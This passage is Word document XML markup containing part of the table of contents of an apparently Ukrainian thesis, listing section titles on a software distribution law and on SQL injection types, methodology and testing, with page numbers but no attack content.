              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="708A8F8A" w14:textId="4A987A67" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433106" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.4.2 Закон України «Про розповсюдження примірників аудіовізуальних творів, фонограм, відеограм, комп’ютерних програм, баз даних»</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_Toc30433106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24</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EB1925A" w14:textId="46A08227" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433107" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>1.5 Висновки по розділу</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_Toc30433107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27</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D484BDB" w14:textId="0B7B3330" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433108" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>РОЗДІЛ 2</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_Toc30433108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29</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6992DD22" w14:textId="47C6FC6A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433109" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>SQL-ІН’ЄКЦІЇ</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_Toc30433109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29</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="423A539E" w14:textId="0284DCA9" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433110" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Атаки, які реалізуються за допомогою SQL-ін’єкцій</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_Toc30433110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29</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52A6AE50" w14:textId="03BD572D" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433111" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Серверні технології які вразливі до SQL-ін’єкцій</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_Toc30433111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30</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F7A0BB3" w14:textId="6A3B1DEF" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433112" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.3 Розуміння запиту SQL-ін’єкцій</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_Toc30433112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30</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="681FCDA8" w14:textId="08232808" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433113" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.4 Типи SQL-ін’єкцій</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_Toc30433113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31</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27219AFF" w14:textId="771ABEC7" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433114" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.4.1 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Error-based SQL injection</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_Toc30433114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32</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F43F0DE" w14:textId="4048F609" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433115" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.4.2 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Blind</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL-ін’єкція</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_Toc30433115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35</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C7C5261" w14:textId="0F1D6C94" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433116" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.5 Методологія SQL-ін’єкцій</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_Toc30433116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36</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48715C5B" w14:textId="58ABCBCE" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433117" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.5.1 Збір інформації</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_Toc30433117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36</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FF0F87C" w14:textId="38F027C9" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433118" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.5.2 </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Identifying data entry paths</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_Toc30433118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37</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A797654" w14:textId="2230163F" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433119" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.5.3 Тестування на SQL-ін’єкції</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_Toc30433119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37</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40BD40B8" w14:textId="5BF53215" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433120" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.5.4 Огляд вихідного коду для виявлення вразливості до SQL-ін’єкцій</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_Toc30433120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40</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3768A245" w14:textId="43A79F46" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433121" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.5.4 Збір інформації через повідомлення про помилку</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_Toc30433121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41</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4425F939" w14:textId="55FE2290" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433122" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.6 Початок атаки SQL</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>ін’єкції</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_Toc30433122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42</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FD6D678" w14:textId="271E49C0" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433123" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.6.1 Виконання UNION SQL-ін’єкції</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_Toc30433123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42</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FEEC6D5" w14:textId="0C07D154" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433124" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>2.6.2 Виконання</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Error Based </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>SQL-ін’єкції</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_Toc30433124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43</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="364EC25B" w14:textId="5234D7FB" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433125" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve">2.6.3 Використання </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Error</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
